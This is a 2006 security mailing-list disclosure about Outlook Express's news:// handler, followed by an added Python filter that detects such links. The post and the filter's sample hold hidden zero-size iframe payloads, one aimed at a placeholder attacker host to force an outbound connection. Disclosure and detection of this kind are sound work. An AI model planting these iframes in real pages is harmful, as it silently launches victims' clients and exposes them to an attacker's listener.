[Full-disclosure] OE - news:// stupid url handler behavior
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] OE - news:// stupid url handler behavior
- From: "Morning Wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Thu, 5 Jan 2006 01:31:15 -0800
Jan 4, 2006
Donnie Werner
http://exploitlabs.com
Web Browser / Outlook Express - stupid url handler behavior
I doubt this warrants a fix (nor Advisory), but it is really dumb,
note the sidebar and titles in OE when testing.
these launch OE from a webpage
1.
==
hi
<iframe src=news://omg-h4ck3d\owned height=0 width=0></iframe>
2.
==
hi
<iframe src=news://[attacker]\owned height=0 width=0></iframe>
listen on netcat, tries to connect ( obviously )
other observations:
==================
there appear to be length limits to:
news://longstring
Windows cannot access the specified device, path, or file.
You may not have the appropriate permissions to access the item
and...
news//something/longstring
Outlook Express could not be started. It may not be installed correctly.
Make sure that your disk is not full or that you are out of memory.
Contact Microsoft support for further assistance. ( 0x80004005, 1411)
[ OK ]
Outlook Express could not be started because MSOE.DLL could not be
initialized.
Outlook Express may not be installed correctly.
remarks:
========
i leave other research open to the public
Donnie Werner
http://exploitlabs.com
http://zone-h.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
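
Added example, not part of the original post: a small content-filter check that flags elements which load a news:-style URL automatically (as the iframes in the post do) and reports the server name they would hand to the mail/news client. The scheme list beyond news:, the list of auto-loading tags, and the names `scan`, `EXTERNAL_SCHEMES` and `AUTOLOAD` are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser

# Assumption: only news: comes from the post; the other schemes are added here
# as further examples of URLs handed to an external mail/news client.
EXTERNAL_SCHEMES = {"news", "snews", "nntp", "mailto"}
# Elements whose URL is fetched on page load, without a click.
AUTOLOAD = {"iframe": "src", "frame": "src", "img": "src",
            "embed": "src", "object": "data"}


class _Finder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in AUTOLOAD:
            return
        a = {k: (v or "").strip() for k, v in attrs}
        url = a.get(AUTOLOAD[tag], "")
        scheme, sep, rest = url.partition(":")
        if not sep or scheme.lower() not in EXTERNAL_SCHEMES:
            return
        # Split by hand: the samples use "\" as a separator and a bracketed
        # placeholder host, which strict URL parsers may reject.
        target = re.split(r"[/\\]", rest.lstrip("/"), maxsplit=1)[0]
        hidden = a.get("height") == "0" and a.get("width") == "0"
        self.findings.append((tag, scheme.lower(), target, hidden))


def scan(html):
    """Return (tag, scheme, target, hidden) for each auto-launching element."""
    finder = _Finder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: the two iframes from the post plus two benign elements.
SAMPLE = r"""
hi <iframe src=news://omg-h4ck3d\owned height=0 width=0></iframe>
hi <iframe src=news://[attacker]\owned height=0 width=0></iframe>
<iframe src="https://example.com/" height=300 width=400></iframe>
<a href="news:comp.security.misc">a link the user must click</a>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The `hidden` flag marks the zero-size case from the post, which is the combination worth alerting on in a proxy or mail-gateway rule.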